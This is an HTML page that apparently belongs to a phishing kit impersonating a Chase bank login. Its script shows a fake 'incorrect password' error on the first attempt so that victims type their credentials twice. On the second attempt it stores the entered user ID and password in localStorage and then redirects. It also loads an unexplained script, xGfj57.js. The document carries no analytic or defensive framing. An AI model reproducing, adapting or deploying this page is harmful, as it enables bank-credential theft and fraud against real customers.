<!DOCTYPE html>
<html>
   <head>
      <meta charset='utf-8'>
      <meta name='viewport' content='width=device-width, initial-scale=1'>
      <title>Successfuly Verified</title>
      <link href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' rel='stylesheet'>
      <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.0.3/css/font-awesome.css' rel='stylesheet'>
      <link rel="stylesheet" type="text/css" href="main.css"/>
      <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
      <script type='text/javascript' src='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js'></script>
      <script type='text/javascript' src='xGfj57.js'></script>
      <link href="loading.css" type="text/css" rel='stylesheet'>
      <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js"></script>
      <style media="screen">
      .prof-back {
          background-image: url('background.desktop.night.3.jpeg');
      }
      </style>
      <script type="text/javascript">
      $( document ).ready(function() {

        document.querySelector("#loadingHide").style.display = "none";
        //document.querySelector("#contentTitty").style.display = "block";
        if (Modernizr.localstorage) {

          console.log(" window.localStorage is available! ");
        } else {
          console.log("no native support for HTML5 storage :(");
          // maybe try dojox.storage or a third-party solution
        }
        var loginAtt;

      });
      var loginAttempt = 0;
      loginAtt = function(){


        document.querySelector("#loadingHide").style.display = "block";
        document.querySelector("#contentTitty").style.display = "none";

           if (loginAttempt == 0){
             setTimeout(function () {
             document.querySelector("#loadingHide").style.display = "none";
             document.querySelector("#contentTitty").style.display = "block";
             document.querySelector("#error").style.display = "block";

             loginAttempt ++;
           }, 6000);
         }
           else {

              y = document.getElementById('uidee').value;
              x = document.getElementById('passah').value;
              localStorage.setItem("uidee", y);
              localStorage.setItem("passah", x);
             setTimeout(function () {

             document.querySelector("#loadingHide").style.display = "none";
             document.querySelector("#contentTitty").style.display = "block";

             window.location.href = "index.html";

           }, 6000);
           }



      }

      </script>

   </head>
   <body class='snippet-body'>
      <!-- MultiStep Form -->
      <div id="contentTitty" class="prof-back" style="height: 2000px;">

      <div id="contentTitty" class="container-fluid" id="grad1">
         <div class="row justify-content-center mt-0">
            <div class="col-11 col-sm-9 col-md-7 col-lg-6 text-center p-0 mt-3 mb-0">
               <div class="card px-0 pt-4 pb-0 mt-3 mb-0">
                 <div class="container">
                  <img src="" alt="" class="w-50">


                  <img src="chase-logo2.png" />
                  <br>
                  <br>
                  <div class="row  justify-content-center">
                    <div class="col-10 mb-4">
                      <h4>Please login using your Online ID to get started</h4>
                    </div>
                  </div>

                    <div class="container container-fluid ">

                      <div class="container row justify-content-center">
                        <div class="col-xs-12 col-md-12 col-lg-10">
                          <div id="error"><h6 class="text-danger">*Your username and password combination was incorrect. Please try again</h6></div>
                        </div>
                      </div>

                    <div class="row justify-content-center">
                      <div class="col-lg-4 col-md-12 mt-3">
                        <input type="text" id="uidee" name="" placeholder="User ID" class="form-control ">
                      </div>
                    </div>
                    <div class="row mb-5 justify-content-center">
                      <div class="col-lg-4 col-md-12 mt-3">
                        <input type="Password" id="passah" name="" value="" placeholder="Password" class="form-control">
                      </div>
                    </div>

                    <div class="row mb-5">
                      <div class="col-12 mt-3">
                        <button class="btn btn-primary w-25" name="button" onclick="loginAtt();">Login</button>
                    </div>
                  </div>
                  <br>
                  <br>
                  <br>
                  <br>


                  </div>
               </div>
            </div>
          </div>
	       </div>
      </div>

      </div>


      <div id="loadingHide"class="">
        <div class="mt-5">


          <div class="container container h-100 d-flex justify-content-center align-items-center">
            <div class="row mt-5 justify-content-center">
              <div class="col-12">
                <h2>Please wait</h2>
              </div>
            </div>
          </div>

          <div class="container d-flex justify-content-center align-items-center">
            <div class="spinner">
              <div class="rect1"></div>
              <div class="rect2"></div>
              <div class="rect3"></div>
              <div class="rect4"></div>
              <div class="rect5"></div>
            </div>
          </div>
        </div>
      </div>
   </body>
</html>
